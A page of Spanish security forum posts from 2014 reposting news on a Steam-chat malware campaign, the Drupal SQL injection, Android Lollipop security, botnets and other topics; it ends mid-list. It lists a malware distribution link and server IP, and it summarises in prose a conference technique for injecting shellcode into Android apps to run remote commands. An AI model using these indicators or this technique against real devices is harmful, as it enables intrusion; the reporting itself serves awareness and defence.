Temas - r32 - Página 8

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - r32

Páginas 1 2 3 4 5 6 7 8 9

#316

Seguridad / Malware spreading via Steam chat

20 Noviembre 2014, 18:50 PM

Desde el blog de BartBlaze, comenta sobre un archivo infectado acortado por url via Steam Chat.
Aquí podemos ver al invitado ofrecer la descarga de una imagen acortada la url por bit.ly:

http://onyxhavok.tumblr.com/post/102332902501/so-this-person-added-me-on-steam-today

Investigando un poco saqué estos archivos del servidor, el archivo es el mismo en todos los casos, solo cambia la dirección url de descarga, hay varias, pero es mejor acceder al server y bajar todas muestras:

La muestra más reciente es paul.exe compilada el dia 17, van retocando casi a diario el server para intentar deshacerse de algunos AV...

Fijense en los resultados (185.36.100.181):

https://www.google.es/search?q=185.36.100.181&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:es-ES:official&client=firefox-a&channel=sb&gfe_rd=cr&ei=eiluVPO6B6mA8QfXm4GYBQ

Whois: http://whois.domaintools.com/185.36.100.181

La URL en cuestión es esta: hxxp://bit.ly/1uVoKek

Comentar que para poder ver hacia donde nos lleva esa url acortada podemos hacer uso de servicios online como:

http://longurl.org/

http://knowurl.com/

http://www.getlinkinfo.com/

Info url acortadas: https://www.osi.es/es/actualidad/blog/2013/05/31/descubre-posibles-riesgos-de-pinchar-en-una-url-acortada

Fuente: http://bartblaze.blogspot.com.es/2014/11/malware-spreading-via-steam-chat.html

PD: @wolfbcn, si ya la publicaste lo siento de nuevo, saludos.

#317

Noticias / Norse: Servicio online para ver ataques a nivel mundial.

14 Noviembre 2014, 21:02 PM

Otro servicio online similar al de Kaspersky Lab:

https://cybermap.kaspersky.com/

En este caso Norse detecta ataques y no infecciones pero bueno, lo vi interesante:

http://map.ipviking.com/

Lo que más curioso me resultó es que detecta el tipo de ataque, ya sea por ssh, telnet, net-bios y demás.

Saludos.

#318

Criptografía / Leccion 3 del MOOC de Crypt4you: Introducción a Bitcoin

4 Noviembre 2014, 18:11 PM

Con el título Introducción a Bitcoin, se ha publicado la tercera y última lección del curso de Sistemas de Pago Electrónico en el MOOC Crypt4you, siendo sus autores los profesores de la Universitat de les Illes Balears María Magdalena Payeras, Andreu Pere Isern y Macià Mut, miembros del grupo de Seguridad y Comercio Electrónico http://secom.uib.es/ SeCOM.

El objetivo de esta lección es el de ofrecer una introducción a los conceptos básicos de Bitcoin, así como a algunos puntos importantes que afectan a su funcionamiento. Como en todo medio de pago, la seguridad y la privacidad son dos requisitos indispensables, por lo que se analizarán los mecanismos que propone Bitcoin para mantener la seguridad, la privacidad y otros requisitos de todo medio de pago. No obstante, Bitcoin también plantea una serie de inconvenientes o excepticismos que por supuesto conviene analizar.

Temario lección 3:

Apartado 3.1. Introducción a Bitcoin
Apartado 3.2. Conceptos criptográficos básicos
Apartado 3.3. Conceptos del protocolo Bitcoin
Apartado 3.4. Estadísticas de la red
Apartado 3.5. Críticas y excepticismo
Apartado 3.6. Monedas digitales alternativas
Apartado 3.7. Conclusiones
Apartado 3.8. Ejercicios
Apartado 3.9. Referencias bibliográficas

http://www.criptored.upm.es/crypt4you/temas/sistemaspago/leccion3/leccion03.html

Saludos.

#319

Noticias / Hacia una evaluación eficaz de la seguridad en ICS

4 Noviembre 2014, 18:02 PM

Las organizaciones nacionales y europeas han mostrado su preocupación por la seguridad en los entornos ICS. En el pasado, se diseñaban y ponían en marcha tales dispositivos para trabajar solamente en redes aisladas. Sin embargo, estas redes aisladas se están conectando cada vez más a Internet. Este cambio supone grandes ventajas, pero también aumenta el número de amenazas, incluyendo el ciberterrorismo.

También, hay cada vez más interés en las evaluaciones de seguridad de este tipo de arquitecturas. Por ejemplo, a nivel europeo, ENISA está discutiendo la importancia de temas como «la creación de un banco de pruebas común, o bien un marco de certificación de seguridad del ICS». Poder conseguir este objetivo puede llevar mucho tiempo. Pero, ¿qué podemos hacer mientras tanto?

INCIBE, como centro de ciberseguridad a nivel nacional, está al tanto de la importancia de trabajar en este reto, por lo que plantea el Proyecto SCADA LAB (Laboratorio SCADA y Banco de Pruebas como Servicio para la Protección de Infraestructuras Críticas). La propuesta acumula el esfuerzo de nueve miembros de distintos países de la Unión Europea: Hungría, Italia, Reino Unido y España.

Este proyecto está incluido dentro del programa «Prevención, preparación y gestión de las consecuencias del terrorismo», un programa específico financiado por la Comisión Europea. Su principal objetivo es analizar las actuales medidas de seguridad aplicadas en entornos ICS a través de:

1- El desarrollo de un laboratorio y banco de pruebas específico, enfocado en el sector energético.
2- La reutilización de los recursos existentes, conocimiento y equipamiento, de una manera eficiente.

Otro precedente importante que hay que tener en cuenta es el informe de ENISA «Protección de sistemas de control industrial. Recomendaciones para Europa y Estados Miembros», que describe la situación actual de la seguridad de los ICS y propone siete recomendaciones para mejorarla. En particular, en su recomendación número 5 destaca la falta de iniciativas específicas en estos entornos y la necesidad de realizar evaluaciones independientes de productos de seguridad de estos sistemas. Entre otros, ENISA fomenta el establecimiento de bancos de pruebas. Estos deben ser entornos realistas que permitan llevar a cabo evaluaciones que hagan validaciones y verificaciones independientes.

En resumen, el principal propósito del proyecto SCADA LAB es la creación de un entorno de pruebas que permita la evaluación en remoto del nivel de seguridad de un ICS, o cualquier parte del mismo. Para llevar a cabo este objetivo, la arquitectura del proyecto está dividida en dos áreas principales: el laboratorio y el banco de pruebas.

- Áreas principales en SCADA LAB -

El Área del Laboratorio incluye tanto el hardware como el sotware necesarios para llevar a cabo una evaluación de seguridad del banco de pruebas.

El Área del Banco de Pruebas es el objetivo a evaluar. Idealmente, su implementación es lo más parecida posible a un ICS en producción.

Dentro del ámbito del proyecto, el Área del Banco de Pruebas se encuentra en la sede de Telvent Energy, en Sevilla, y el Área de Laboratorio está ubicado en las instalaciones de INCIBE, León.
Metodología de pruebas

Leer completo en :

https://www.incibe.es/blogs/post/Seguridad/BlogSeguridad/Articulo_y_comentarios/SCADALAB_seguridad_ICS

#320

Noticias / Vulnerabilidad en Drupal deja a millones de sitios web en peligro

4 Noviembre 2014, 17:50 PM

Vulnerabilidad en Drupal deja a millones de sitios web en peligro

Responsables del gestor de contenidos, Drupal, han advertido a sus usuarios que sus sitios web están en peligro si no actualizaron en su momento a la última versión publicada el 15 de octubre.

Ataques automáticos que comprometen webs realizadas con Drupal 7 que no fueron actualizadas a la versión 7.32 comenzaron a las pocas horas de publicarse el parche. Si no se actualizó la web antes del 15 de octubre a las 23h UTC, es decir a las 7 horas de la publicación del parche, se debe proceder como si todas las webs estuvieran comprometidas, explican desde el CMS.

Drupal es un paquete de software de código abierto que proporciona un sistema de gestión de contenido (CMS) para sitios web. Es el tercero del mercado por popularidad detrás de WordPress y Joomla y se creen que esta vulnerabilidad crítica de inyección de código SQL ha dejado comprometidos 12 millones de sitios web.

Curiosamente la última actualización Drupal 7.32 corregía este tipo de vulnerabilidades. El problema reside en que de nada sirve actualizar ya estos sitios comprometidos, algo que ha ocurrido mediante "ataques automatizados" a las 7 horas de publicarse el parche, explican.

No es sencillo parchear tan rápidamente las máquinas, dicen desde la firma Sophos. Muchos usuarios no recibieron el aviso a tiempo simplemente porque estuvieran durmiendo por la diferencia horaria. La solución sería que Drupal implemente un sistema de actualización automática para la instalación de los parches de seguridad, algo que ya tienen otros gstores como WordPress.

Parche: https://www.drupal.org/SA-CORE-2014-005

+ info: https://www.drupal.org/PSA-2014-003

Fuente: http://muyseguridad.net/2014/11/04/vulerabilidad-en-drupal

#321

Noticias / CSC: Controles de Seguridad Críticos para la ciberdefensa

4 Noviembre 2014, 17:04 PM

En el ámbito de seguridad de la información los controles nos permiten mitigar riesgos, razón por la cual se han desarrollado marcos de trabajo (frameworks) que ofrecen diferentes tipos de medidas de seguridad.

En esta ocasión vamos a revisar los Controles de Seguridad Críticos (CSC) para la ciberdefensa, una propuesta inicialmente coordinada por SANS Institute que luego fue transferida al Consejo de Ciberseguridad para su administración y mantenimiento.

¿Qué son los controles de seguridad críticos y qué los diferencia?

Se trata de un conjunto de controles que definen acciones específicas para la ciberdefensa, desarrollado y mantenido por diferentes partes interesadas, como empresas, agencias gubernamentales, instituciones académicas y expertos en el tema.

Se denominan críticos porque son el resultado del conocimiento combinado que se tiene actualmente sobre los ataques y las medidas de seguridad utilizadas para mitigarlos. Estos controles han sido priorizados con base en la reducción de riesgos y la protección que ofrecen contra las amenazas más comunes. Además se trata de un consenso sobre el conjunto de las medidas que resultan efectivas para detectar, prevenir, responder o mitigar los ciberataques.

Aunque no busca reemplazar a los marcos de trabajo y estándares, estos controles surgen como una opción para ofrecer nuevas alternativas de seguridad, ya que los requisitos de las normas y otros marcos desarrollados en ocasiones se enfocan en el cumplimiento y elementos de gestión, destinando recursos a actividades que no están directamente relacionadas con la protección contra las amenazas.

Características de los controles de seguridad críticos

Los controles tienen como característica principal su enfoque hacia la priorización de las funciones de seguridad, que han mostrado efectividad para la mitigación de riesgos, lo que indica qué debería realizarse primero, dentro de una lista relativamente pequeña de acciones.

Además se trata de un subconjunto del catálogo definido por National Institute of Standards and Technology (NIST) SP 800-53, por lo que los elementos recomendados han sido probados con anterioridad. La versión 5.1 de este documento incluye 20 controles de seguridad críticos.

Para llevar un control se presenta una descripción de su importancia en cuanto a la forma de identificar o bloquear la presencia de ataque, así como la forma en la que un atacante podría aprovechar la ausencia de este control. Para identificarlos se emplean las letras CSC (Critical Security Control) y el número correspondiente a la prioridad del mismo.

Además, incluye una lista de las acciones específicas que las organizaciones deben llevar a cabo para implementar, automatizar y medir la efectividad del control. El CSC también considera procedimientos y herramientas que permiten su implementación y automatización, así como métricas y pruebas que permiten evaluar el estado de la implementación y su efectividad. Por último, se cuenta con un diagrama entidad-relación de los componentes utilizados durante la implementación.

Categorías de CSC

Dentro de la lista de controles de seguridad críticos podemos encontrar cuatro categorías que permiten tener una mejor descripción de los mismos, con base en las características que se muestran a continuación:

Triunfos rápidos: Son los tipos de controles que proporcionan una reducción significativa de los riesgos sin la necesidad de llevar a cabo importantes cambios en aspectos financieros, de procedimientos, en arquitecturas o técnicos. También pueden proporcionar dicha reducción de manera sustancial o inmediata sobre los ataques más comunes en las organizaciones.
Medidas de visibilidad y de atribución: Estos controles buscan mejorar los procesos, arquitectura y capacidades técnicas de las organizaciones para monitorear sus redes y sistemas informáticos, para detectar intentos de ataques, localizar los puntos de acceso, identificar equipos comprometidos, actividades de infiltración de atacantes u obtener información sobre los orígenes de un ataque.
Configuración de seguridad de la información mejorada e higiene: Tienen como objetivo reducir el número y la magnitud de las vulnerabilidades de seguridad, así como mejorar el funcionamiento de los sistemas informáticos en la red, a través de un enfoque hacia las prácticas de seguridad deficientes que podrían dar ventaja a un atacante.
Subcontroles avanzados: Utilizan nuevas tecnologías o procedimientos que proporcionan mayor seguridad, pero representan mayor dificultad para su implementación, mayor costo o requieren más recursos, como personal altamente calificado.

Una opción más de seguridad a considerar

Entonces, los controles de seguridad críticos pueden ser utilizados como una opción más de medidas para la protección, con las características propias de esta lista como la priorización de las acciones a realizar y su completa orientación hacia la detección, prevención, respuesta o mitigación de amenazas a la seguridad.

En este sentido, pueden contribuir en la complementación de otros estándares o mejores prácticas de seguridad, ya que ofrecen medidas actualizadas sobre las amenazas más comunes y otras características, como elementos para la medición de la efectividad, procedimiento y herramientas.

Créditos imagen: © /Flickr

Autor Miguel Ángel Mendoza, ESET

#322

Noticias / Las 5 mejoras de seguridad de Android Lollipop

4 Noviembre 2014, 16:36 PM

Con el lanzamiento de Android 5.0 Lollipop a la vuelta de la esquina son muchos los usuarios que esperan ansiosos las nuevas funcionalidades del sistema operativo de Google. Muchos usuarios se sentirán especialmente atraídos por la nueva interfaz Material Design pero nosotros vamos a centrarnos en 5 aspectos de la seguridad que han sido mejorados en esta nueva versión de Android.

Cifrado por defecto

Esta es quizás la característica que pasará más desapercibida para los usuarios pero que otorgará mayor privacidad a los datos que almacenemos en nuestro dispositivo. Si bien es cierto que Android venía ofreciendo a sus usuarios la posibilidad de cifrar el contenido de sus dispositivos, esta opción requería ser activada por el usuario.

En Lollipop, el cifrado vendrá activado por defecto, manteniendo seguras nuestras fotos, vídeos o documentos privados de miradas indiscretas, necesitándose una clave para poder acceder a los mismos de forma segura. No hace falta decir que esta clave de cifrado deberá ser lo suficientemente robusta como para que no pueda ser fácilmente adivinada o rota por mecanismo de fuerza bruta.

Viendo que Apple también ha adoptado medidas similares, esta característica parece una reacción de ambas empresas ante los casos de espionaje gubernamental destapados tras las revelaciones que aún al día de hoy siguen produciéndose por los documentos filtrados por Edward Snowden.

De todas formas, de nada sirve cifrar esta información en nuestro dispositivo si después la subimos a sistemas de almacenamiento en la nube. Es importante que, si queremos tener una copia de seguridad de esta información, esta también se encuentre cifrada.

Bloqueo de la pantalla

Una de las medidas de seguridad básicas que prácticamente todos los usuarios realizan es bloquear su pantalla con un código PIN o un patrón de desbloqueo. A estos sencillos métodos se han añadido recientemente la posibilidad de utilizar valores biométricos como el reconocimiento facial o de nuestras huellas dactilares.

Google quiere ir un paso más allá y hacer este proceso de bloqueo / desbloqueo de forma más sencilla y propone utilizar Smart Lock, una funcionalidad de Android Lollipop que permite desbloquear nuestro dispositivo mediante la vinculación vía Bluetooth o NFC a otro dispositivo, como por ejemplo un smartwatch (reloj inteligente). Además, el sistema de reconocimiento facial se ha mejorado, haciendo que su utilización sea más rápida y efectiva.

Además de estas nuevas características, podremos configurar qué tipo de notificaciones se pueden mostrar en la pantalla de bloqueo, pudiendo acceder a información interesante de forma rápida y manteniendo nuestro dispositivo bloqueado.

Compartir WiFi de forma segura

Buena parte de la seguridad de una red WiFi depende de la robustez de su contraseña. Estas contraseñas suelen darse alegremente demasiadas veces, especialmente en sitios públicos como bares o bibliotecas, algo que compromete seriamente la seguridad de la red y que puede provocar que tengamos visitantes inesperados.

Para evitar tener que ir cambiando continuamente de contraseña, Google propone un nuevo sistema a base de utilizar etiquetas inteligentes con tecnología NFC. De esta forma, podremos almacenar la contraseña de nuestra red WiFi en una de estas tarjetas y dársela a los usuarios que quieran hacer uso de la misma, sin comprometer en ningún momento la clave usada para proteger la red.

Restauración de fábrica con contraseña

La popularización de los smartphones también ha provocado que los delincuentes se fijen en ellos como un botín apetecible y cada día se roban miles de ellos para desconsuelo de los usuarios. Existen herramientas como Android Device Manager o nuestra solución de seguridad ESET Mobile Security que permiten bloquear remotamente el dispositivo borrado, borrar su contenido o incluso localizarlo en Google Maps.

No obstante, si se realiza una restauración del dispositivo al estado en el que sale de fábrica, estas aplicaciones también desaparecen y perdemos la oportunidad de intentar recuperar nuestro Smartphone.

Para evitar esta situación, en Android Lollipop se requiere una contraseña para restaurar el teléfono a los valores de fábrica. De esta forma, si un ladrón intenta "limpiar" el teléfono para venderlo de segunda mano no podrá hacerlo sin esta contraseña, dándole más tiempo al legítimo propietario para tratar de recuperar su dispositivo.

SELinux, más seguro todavía

Desde la aparición de Android, el sistema operativo siempre ha confiado en una sandbox para ejecutar las aplicaciones en un entorno aislado de forma controlada. No obstante, si analizamos la situación actual del malware en dispositivos móviles observaremos como los delincuentes han conseguido saltarse esta protección y propagan sus amenazas sin muchos problemas.

Google quiere poner fin a esta situación y en Lollipop activa por defecto el modo "enforced" para las aplicaciones en todos los dispositivos. De esta forma se evita que los delincuentes se aprovechen sin demasiadas complicaciones de las vulnerabilidades que vayan apareciendo en el sistema. Sin duda un movimiento inteligente por parte de Google que no solo nos beneficia a los usuarios de a pie si no que apunta también a los entornos corporativos.

Conclusión

Todas estas características ayudarán sin duda a hacer de Android un sistema más seguro pero no hemos olvidar que los usuarios somos la mayoría de las veces la principal línea de defensa y hemos de estar informados acerca de las amenazas que puedan afectar a nuestros dispositivos. Si además contamos con una solución de seguridad como ESET Mobile Security (que cuenta con una versión gratuita) que nos ayude a establecer capas de defensa adicionales, podremos disfrutar de todas las bondades del nuevo Android Lollipop de una forma segura.

Créditos imagen: © Jackie/Flickr

Autor Josep Albors, ESET

#323

Noticias / Dos hilos, una aplicación: explotación en Android

4 Noviembre 2014, 16:33 PM

El pasado viernes, en la última jornada de la Ekoparty, los investigadores representantes de Core Security Technologies, Martin Balao y Martin Fernandez, nos deleitaron con su demostración de explotación de aplicaciones Android para lograr la ejecución de comandos en dispositivos remotos. Esto se lograba mediante la posibilidad de inyectar procesos para hacer uso de aplicaciones con vulnerabilidades conocidas, y así conseguir acceso a los permisos vigentes en el equipo víctima. A lo largo de su presentación explicaron cómo explotar, escalar y post-explotar este tipo de debilidades presentes en uno de los sistemas operativos móviles más utilizados mundialmente, de manera absolutamente imperceptible para el usuario del terminal.

¿En qué consiste la explotación?

La idea principal de su desarrollo radica en la inyección de procesos para obtener los permisos otorgados a una aplicación vulnerable, y así lograr ganar acceso a la Dalvik VM. Esto se logra mediante la explotación de la clase WebView, la cual presenta componentes HTML y javascript –usualmente utilizados para mostrar publicidades al usuario. Éstos vuelven posible la exposición de instancias de clases de Java con la utilización del método addJavascriptInterface() que exporta un objeto JSInterface, deviniendo en la invocación de métodos estáticos como getClass() o forName(), y la eventual obtención del contexto de ejecución conjuntamente a la explotación de cualquier clase cargada en la VM, pudiendo ejecutarse con esta vulnerabilidad diferentes comandos en el sistema operativo remoto.

Entre las dificultades que este enfoque presenta encontramos la fuerte presencia de sandboxing en Android, con aplicaciones corriendo en espacio de usuario, sin privilegios de administrador –y consecuentemente, sin acceso al sistema de archivos o la posibilidad de instalar otras aplicaciones, y el hecho de que binder –el driver del kernel en el sistema operativo Android– utiliza tanto identificadores de usuario como de procesos en su operatoria.

Dado que la presencia de sandboxes restringe la comunicación entre aplicaciones, el objetivo de la explotación se torna entonces en utilizar permisos de aplicaciones vulneradas para interactuar con otros procesos, no desde un proceso separado, sino con la escritura e invocación de archivos en el filesystem desde el mismo proceso mediante inyección. Esto implica la capacidad de alocar un espacio de memoria, escribir un shellcode en el mismo, crear un hilo que lo ejecute, y lograr realizar esto sin corromper la memoria virtual del proceso y el estado de los diferentes hilos.

Y ahora, ¿cómo resulta esto posible?

Ya que, al acoplar un depurador a un proceso, generamos otro proceso padre del mismo bajo nuestro control, somos capaces entonces de interceptar los mensajes enviados al hilo original, otorgándonos el poder de escribir espacio de memoria –incluso de sólo lectura–, leer el contexto de ejecución del hilo, secuestrarlo, detenerlo, o ejecutarlo en un lugar de memoria diferente. Con base en este principio, podemos acoplar un depurador a un hilo de la Dalvik VM, alocar memoria, escribir un shellcode, crear un hilo de ejecución, y utilizar las variables mapeadas entre direcciones físicas y virtuales, dejando finalmente el proceso en su estado original.

Algunos linkers dinámicos presentan la función dlopen, la cual carga una dirección en la memoria del proceso. Para ubicar esta función y acoplarse a ella, es posible buscar la entrada correspondiente en la Global Offset Table (GOT), la cual nos redireccionará a la posición final absoluta de los símbolos de la llamada a la función, pero sólo una vez que el linker dinámico la resuelva.

Entonces, debemos mirar cada entrada en la Procedure Linkage Table (PLT), las cuales constan de un pequeño código ejecutable. En vez de llamar a la función directamente, el código llama una entrada en la PTL, la cual luego se encarga de invocar la función genuina. Esta estructura es conocida como "trampolín". La identificación de este arreglo se basará en el estudio de patrones aritméticos de los registros, donde cada secuencia de instrucciones corresponde a una función diferente. Una vez determinado el trampolín correspondiente a dlopen, es posible colocar en éste el hilo secuestrado a ejecutar.

La clase ActivityThread del framework contiene un método estático que inicializa la creación del hilo principal de la aplicación vulnerable. Ésta presenta un atributo sMainThreadHandler que devuelve una instancia de Handler, la cual permite mediante el método post() encolar objetos Runnable a ser ejecutados. Un atacante puede generar una llamada nativa para invocar este método, y así obtener una referencia a un objeto Context. Este último actúa como interface para acceder a la información general sobre el contexto de ejecución de la aplicación, como ser recursos y clases específicos de la misma, o llamadas desde binder al Activity Manager Service para realizar operaciones como lanzar actividades, publicar y recibir intentos, y concretar acciones de alto nivel –como la lectura o envío de SMSs.

Resumiendo lo aprendido...

Luego de la inyección, un atacante podría interactuar con binder utilizando Java a modo de post-explotación. De esta forma, se consigue acceso a los objetos en Java, sus métodos, y los métodos estáticos de las clases a las que pertenecen. Una manera de lograr esto es instanciar un objeto de APK ClassLoader, y utilizarlo para cargar código malicioso.

El resultado final de la explotación es la posibilidad de reemplazar los javascripts, incluir payloads binarios, escribir éstos en el sistema de archivos, y concluir con un Java Agent ejecutando en el equipo víctima con el mismo identificador de proceso que la aplicación vulnerable, lo que permite la posterior escalación de privilegios y la inyección remota de comandos –como la generación de llamadas o el envío de SMSs, el listado del sistema de archivos o de los procesos actualmente siendo ejecutados en el sistema operativo.

Como bien resaltaron los oradores, el comprender este tipo de vulnerabilidades nos recuerda la importancia de evitar aplicaciones depurables en entornos de producción, siendo las entidades corporativas potenciales blancos para estos ataques. Además, los archivos .apk construidos en modo standalone –es decir, paquetes de aplicación que no requieren de otros paquetes o archivos para funcionar– se constituyen como un sistema inherentemente débil, que de ser combinado con un proceso de explotación como el explicado a lo largo de esta charla, pueden generar poderosos vectores de ataque.

Créditos imagen: ©Windell Oskay/Flickr

#324

Noticias / Swedish hacker finds 'serious' vulnerability in OS X Yosemite

2 Noviembre 2014, 10:29 AM

No es nueva, puede que tenga un mes desde que se descubrió pero va avanzando:

Un hacker de sombrero blanco (WhiteHack) de Suecia dice que ha encontrado un agujero de seguridad grave en Yosemite de Apple OS X que podría permitir a un atacante tomar el control de su ordenador.

Emil Kvarnhammar, un hacker de la firma de seguridad sueca TrueSec, llama a la vulnerabilidad "rootpipe" y ha explicado cómo lo encontró y cómo se puede proteger en contra de ella.

Es una llamada vulnerabilidad de escalada de privilegio, lo que significa que, incluso sin una contraseña a un atacante podría conseguir el más alto nivel de acceso en una máquina, conocida como acceso a la raíz. A partir de ahí, el atacante tiene el control total del sistema.

Afecta a la versión más reciente de OS X, versión 10.10, conocida como Yosemite. Apple no ha solucionado el fallo, sin embargo, él dice, por lo TrueSec no proporcionará detalles aún de cómo funciona

[youtube=640,360]https://www.youtube.com/watch?v=fCQg2I_pFDk[/youtube]

Mas información: http://www.macworld.com/article/2841965/swedish-hacker-finds-serious-vulnerability-in-os-x-yosemite.html?utm_content=buffercad28&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer

https://twitter.com/hashtag/RootPipe?src=hash

#325

Noticias / ¿Qué son las botnets y cómo combatirlas?

1 Noviembre 2014, 03:40 AM

El malware o los códigos maliciosos han estado aquí de alguna manera por más de 40 años, pero el uso de malware para tomar el control de un grupo de computadoras organizadas en algo llamado "botnet", es un fenómeno del siglo 21. Las botnets han sido responsables de algunos de los incidentes de seguridad más costosos de los últimos 10 años, por lo que hay mucho esfuerzo puesto en derrotar a este tipo de amenazas y, cuando es posible, cerrarlas de una vez.

Recientemente, tuve la chance de entrevistar a alguien que pasa mucho tiempo batallando botnets: Pierre-Marc Bureau, Security Intelligence Program Manager de ESET. Le pedí que explicara qué son, qué amenaza suponen, y cómo defenderse de este tipo de malware.
¿Qué es una botnet, cómo funciona y cómo se propaga?

La palabra botnet se compone de dos palabras: "bot" y "net". "Bot" viene de "robot", un nombre que a veces le damos a una computadora que ha sido infectada con software malicioso. "Net" viene de "network" (red), un grupo de sistemas que están conectados entre sí. Las personas que escriben y operan malware, no pueden ingresar manualmente a cada equipo que han infectado. En su lugar, utilizan botnets para manejar de manera automática un gran número de sistemas infectados. En resumen, una botnet es una red de computadoras infectadas, y dicha red es utilizada para propagar el malware.
¿Cómo puedes darte cuenta que tu equipo es parte de una botnet? ¿Tiene impacto sobre el rendimiento de un sistema?

Cuando una computadora forma parte de una botnet, puede recibir instrucciones para, entre otras cosas, enviar spam o saturar un sitio web. Estos comportamientos pueden ser visibles para aquellos usuarios que tienen un limitado ancho de banda de Internet.

Un usuario puede descubrir si su equipo está infectado a través de diferentes herramientas. La más típica es utilizar un buen producto anti-malware. Para usuarios con mayores conocimientos técnicos, una herramienta de diagnóstico como ESET SysInspector, o simplemente observando los procesos que corren en el sistema y los programas instalados, pueden llegar a revelar la presencia de una infección. De todos modos, no siempre es tan fácil determinar la presencia de una botnet.
¿Quién está detrás de las botnets y para qué son utilizadas?

Las botnets son utilizadas por actores maliciosos para varios propósitos, que van desde robo de información a enviar spam. Como con cualquier cosa, cuantos más recursos tengas, más rápido será conseguir los resultados. Varios tipos de personas operan las botnets. Bandas criminales las utilizan para robar credenciales de acceso de home banking con el objetivo de cometer fraudes, mientras que existen "bromistas" que las usan para espiar por webcams para luego extorsionar a sus víctimas.
¿Cuál es el rol de un servidor de Comando y Control en una botnet? ¿Poder derribarlo ocasiona también la eclosión de toda la botnet?

Lo que llamamos un servidor de Comando y Control (algunas veces es llamado C&C o C2) es un servidor central que es usado para conectar a todos los equipos infectados. Con la mayoría de las botnets, si se cierra el panel de Comando y Control, significa derribar toda la red de equipo infectados.

De todas maneras, existen excepciones: la primera es que hay botnets que usan redes P2P (red entre iguales) para comunicarse, lo que significa que no hay un servidor de Comando y Control para dar de baja. La segunda excepción se da en el caso que estamos viendo cada vez más: botnets que usan diversos servidores de Comando y Control. Estos están localizados en diferentes países y jurisdicciones, haciendo muy dificultoso darlos de baja al mismo tiempo.
¿Cuáles son los riesgos más grandes para los usuarios hogareños y las empresas?

Los riesgos asociados a las botnets son exactamente los mismos que el software malicioso en general. Son variados: puede haber información sensible robada de un dispositivo electrónico, tales como propiedad intelectual, planos o contraseñas de acceso a recursos estratégicos. Las computadoras infectadas además pueden ser utilizadas para sobrecargar servidores y para enviar spam.

Es muy importante entender que una vez que un equipo está infectado, no pertenece más realmente a su dueño, es operada y usada por alguien que puede estar del otro lado del mundo, potencialmente conduciendo todo tipo de actividades ilegales.
¿Quién está más en peligro: las empresas o los usuarios hogareños?

La línea entre los dispositivos personales y corporativos es bastante borrosa. Todos llevamos nuestros dispositivos personales al trabajo y viceversa. Yo diría que las botnets son una amenaza para ambos tipos de usuarios. En general, las redes corporativas tienen una seguridad más estricta y realizan monitoreos; identificar y detener ataques de botnet debería ser más sencillo en este tipo de redes. Por el otro lado, existe información más sensible para ser robada en la red de una empresa.
¿Existe algún grupo o tipo de usuario que sea más vulnerable que el resto?

Realmente no. Hay varios tipos de malware, cada uno puede ser utilizado para apuntarle a un grupo diferente de usuarios.
Históricamente, ¿cuáles son las botnets más conocidas, las más grandes y la peor?

Conficker es probablemente la botnet que ha recibido mayor atención y seguro es una de las más grandes de la historia, con millones de equipos infectados muy rápidamente. Esto originó que la comunidad de investigación organizara una fuerza especial para combatirla. Como resultado, la botnet nunca fue utilizada por sus operadores. Otras significativas incluyen a Storm que era utilizada principalmente para enviar spam; y TDSS (también llamada Alureon) que tenía un componente de rootkit que era bastante difícil de limpiar del sistema.
¿ESET ha descubierto alguna botnet grande este año?

Sí, nuestra investigación de Operación Windigo resultó ser uno de los proyectos de investigación de botnets de la historia de ESET. Nuestro equipo descubrió una red de servidores infectados que eran usados para redirigir usuarios a contenidos web maliciosos, robar credenciales y enviar spam. Descubrimos que en los últimos años, más de 25.000 servidores habían sido infectados. En el momento que escribimos nuestro reporte, más de 10.000 servidores seguían infectados (Nota del Editor: Pueden descargar el premiado paper de investigación sobre Windigo aquí).
¿Qué sistema operativo suele utilizar un bot? ¿Han visto botnets para Mac, Linux o Android?

Hemos visto software malicioso creado para todos los grandes sistemas operativos. Agrupar dispositivos infectados en redes, o botnets, es posible en todas las plataformas. Un ejemplo de esto es el malware Flashback, que infectó a cientos y miles de dispositivos Mac.
¿Cuál es el enfoque más efectivo a la hora de combatir botnets?

Desde una perspectiva tecnológica, hay varias maneras de combatir las botnets, empezando por utilizar un anti-malware. De esa manera, se pueden advertir infecciones en el tráfico de red, en la memoria de equipos infectados o en su disco duro. Por el otro lado, creo que el enfoque más efectivo para combatir las botnets es la educación, despertando conciencia sobre esta amenaza.

Necesitamos que todo el mundo se dé cuenta que si su equipo está infectado, puede ser utilizado para lastimar a otros. Por lo tanto, cada vez que se encuentra un equipo infectado, es necesario desconectarlo y limpiarlo lo más rápido posible. Finalmente, la colaboración entre usuarios, grupos de investigación, proveedores de Internet y agencias de seguridad, ayuda enormemente a combatir las botnets y a llevar a la justicia a aquellos que las operan.

Créditos imagen: ©Hans Põldoja/Flickr

Autor Stephen Cobb, ESET

#326

Noticias / Top 5 de botnets zombi más aterradoras

1 Noviembre 2014, 03:37 AM

Un ejército de muertos vivientes haciendo estragos en Internet. Esta es una pesadilla que se ha repetido una y otra vez desde que la población online del mundo ha explotado, pero una y otra vez, protectores de la web se han unido para detener estas hordas maliciosas –aunque no ha sido fácil. Hay algunas plagas de botnets conformadas por zombis que han sido particularmente problemáticas; daremos un vistazo a lo peor de lo peor.

Si eres un lector asiduo de este blog, te debes haber encontrado con el término "bot" muchas veces. Las botnets son uno de los tipos más populares de malware, ya que ofrecen una forma de controlar un gran número de máquinas al mismo tiempo, para que hagan lo que dicte el atacante. Si no estás familiarizado con el término, debería ser de ayuda entender a estas horrorosas bestias refiriéndonos a ellas con uno de sus alias menos comunes.

Un "zombi" es una máquina que ha sido infectada con un cierto tipo de malware controlado remotamente. La imagen mental que deberías estar figurándote con este nombre es una entidad que ha sido despojada de sus motivaciones usuales y se comporta de formas inusuales e indeseables. En este caso podría ser, por ejemplo, una computadora propagando spam, haciendo clic en anuncios silenciosamente, o robando información sensible y financiera.

Una red de zombis es casi como un escenario de infección post-apocalíptico en el cine. Algunas de esas cosas son virtualmente inmortales o imposibles de matar –siempre parece haber una última criatura al acecho en las sombras, lista para empezar una nueva ola de problemas.

Aquí tienes una lista de cinco redes zombi que me pusieron los pelos de punta -a mí, y a muchos otros investigadores ayudando a tratar de detenerlas.

1. Storm

